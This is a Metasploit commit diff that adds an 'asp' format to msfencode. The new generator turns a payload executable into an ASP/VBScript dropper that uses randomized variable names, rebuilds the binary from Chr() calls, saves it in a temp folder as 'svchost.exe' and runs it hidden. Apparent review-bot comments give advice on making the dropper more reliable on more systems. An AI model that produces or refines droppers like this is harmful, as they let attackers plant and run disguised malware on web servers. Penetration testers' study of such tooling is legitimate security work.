
Add -t asp to msfencode :)

git-svn-id: file:///home/svn/framework3/trunk@8013 4d416f70-5f16-0410-b530-b9f4589650da
1 parent 1f2c1e7 commit 1d1f94593ce05b2f6d1007e95aed561513b28d1c HD Moore committed Dec 28, 2009
Showing with 71 additions and 3 deletions.
  1. +59 −0 lib/msf/util/exe.rb
  2. +12 −3 msfencode
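--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -506,10 +506,69 @@ def self.to_exe_vbs(exes = '', opts={})
 vbs
 end
+def self.to_exe_asp(exes = '', opts={})
+exe = exes.unpack('C*')
+vbs = "<%\r\n"
+
+var_bytes = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
+var_fname = Rex::Text.rand_text_alpha(rand(8)+8)
+var_func = Rex::Text.rand_text_alpha(rand(8)+8)
+var_stream = Rex::Text.rand_text_alpha(rand(8)+8)
+var_obj = Rex::Text.rand_text_alpha(rand(8)+8)
+var_shell = Rex::Text.rand_text_alpha(rand(8)+8)
+var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
+var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
+var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)
+
+vbs << "Sub #{var_func}()\r\n"
+
+vbs << "#{var_bytes}=Chr(#{exe[0]})"
+
+lines = []
+1.upto(exe.length-1) do |byte|
+if(byte % 100 == 0)
+lines.push "\r\n#{var_bytes}=#{var_bytes}"
+end
+# exe is an Array of bytes, not a String, thanks to the unpack
+# above, so the following line is not subject to the different
+# treatments of String#[] between ruby 1.8 and 1.9
+lines.push "&Chr(#{exe[byte]})"
+end
+vbs << lines.join("") + "\r\n"
+
+vbs << "Dim #{var_obj}\r\n"
+vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
+vbs << "Dim #{var_stream}\r\n"
+vbs << "Dim #{var_tempdir}\r\n"
+vbs << "Dim #{var_tempexe}\r\n"
+vbs << "Dim #{var_basedir}\r\n"
+vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"
+
+vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
+vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
+vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
+vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
+vbs << "#{var_stream}.Write #{var_bytes}\r\n"
+vbs << "#{var_stream}.Close\r\n"
+vbs << "Dim #{var_shell}\r\n"
+vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
+
+vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
+vbs << "End Sub\r\n"
+
+vbs << "#{var_func}\r\n"
+vbs << "%>\r\n"
+vbs
+end
+
 def self.to_win32pe_vbs(framework, code, opts={})
 to_exe_vbs(to_win32pe(framework, code, opts), opts)
 end
+def self.to_win32pe_asp(framework, code, opts={})
+to_exe_asp(to_win32pe(framework, code, opts), opts)
+end
+
 # Creates a .NET DLL which loads data into memory
 # at a specified location with read/execute permissions
 # - the data will be loaded at: base+0x2065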
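Review bot: The generated `#{var_shell}.run #{var_tempexe}, 0, false` line hands the dropped path to WshShell.Run unquoted, so a temporary folder whose path contains a space (a profile-based temp directory such as `C:\Documents and Settings\...`, for instance) would be split at the first space; quoting it is a one-line change: `vbs << "#{var_shell}.run Chr(34) & #{var_tempexe} & Chr(34), 0, false\r\n"`. Separately, `opts` is accepted by `to_exe_asp` but never read, while msfencode forwards `:persist => false` into it — either honor `:persist` the way the VBS variant presumably does, or add a comment above the `def` stating that only `:template` (consumed by `to_win32pe`) is meaningful for this format. The executable is also written through a FileSystemObject text stream assembled from `Chr()` calls, which round-trips bytes 128–255 on single-byte code pages but may not on DBCS system locales; if that limitation is already known from `to_exe_vbs`, a short comment on the `CreateTextFile` line would spare the next maintainer a debugging session. Finally, the dropper leaves `svchost.exe` on disk under a random temp subfolder with no cleanup, which is worth stating in a header comment since callers may care about the on-disk artifact.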
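--- a/msfencode
+++ b/msfencode
@@ -20,7 +20,7 @@ $args = Rex::Parser::Arguments.new(
 "-m" => [ true, "Specifies an additional module search path" ],
 "-a" => [ true, "The architecture to encode as" ],
 "-p" => [ true, "The platform to encode for" ],
-"-t" => [ true, "The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs)" ],
+"-t" => [ true, "The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs, asp)" ],
 "-b" => [ true, "The list of characters to avoid: '\\x00\\xff'" ],
 "-s" => [ true, "The maximum size of the encoded data" ],
 "-e" => [ true, "The encoder to use" ],
@@ -124,7 +124,7 @@ $args.parse(ARGV) { |opt, idx, val|
 when "-s"
 space = val.to_i
 when "-t"
-if (val =~ /^(perl|ruby|rb|raw|c|js_le|js_be|java|exe|exe-small|elf|vba|vbs|loop-vbs)$/)
+if (val =~ /^(perl|ruby|rb|raw|c|js_le|js_be|java|exe|exe-small|elf|vba|vbs|loop-vbs|asp)$/)
 fmt = val
 else
 $stderr.puts(OutError + "Invalid format: #{val}")
@@ -228,7 +228,7 @@ case cmd
 if(not arch or (arch.index(ARCH_X86)))
 exe = Msf::Util::EXE.to_win32pe_old($framework, raw)
 end
-
+
 if(not output)
 $stdout.write(exe)
 else
@@ -273,6 +273,15 @@ case cmd
 fd.write(vbs)
 end
 end
+when 'asp'
+asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:persist => false, :template => altexe})
+if(not output)
+$stdout.write(asp)
+else
+File.open(output, "wb") do |fd|
+fd.write(asp)
+end
+end
 else
 fmt ||= "ruby"
 if(not output)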
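Review bot: The `-t` help string and the validation regex now carry two hand-maintained copies of the format list, and they already disagree — the help text omits `rb`, `js_le`, `js_be` and `exe-small`, all of which the regex accepts (pre-existing, but this commit edits both lines). Deriving both from one list keeps them honest and also drops the per-line `^`/`$` anchors: `FORMATS = %w[perl ruby rb raw c js_le js_be java exe exe-small elf vba vbs loop-vbs asp]`, then `"(#{FORMATS.join(', ')})"` in the help text and `if FORMATS.include?(val)` in place of the regex. The new `when 'asp'` branch also repeats the stdout/`File.open(output, "wb")` block from the `vbs` branch just above it verbatim; a small `write_output(data, output)` helper would remove that duplication across the format cases. The `{:persist => false, :template => altexe}` hash is forwarded to `to_win32pe_asp`, whose generator does not appear to read `:persist`, so that key is effectively inert here and could be dropped or commented.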
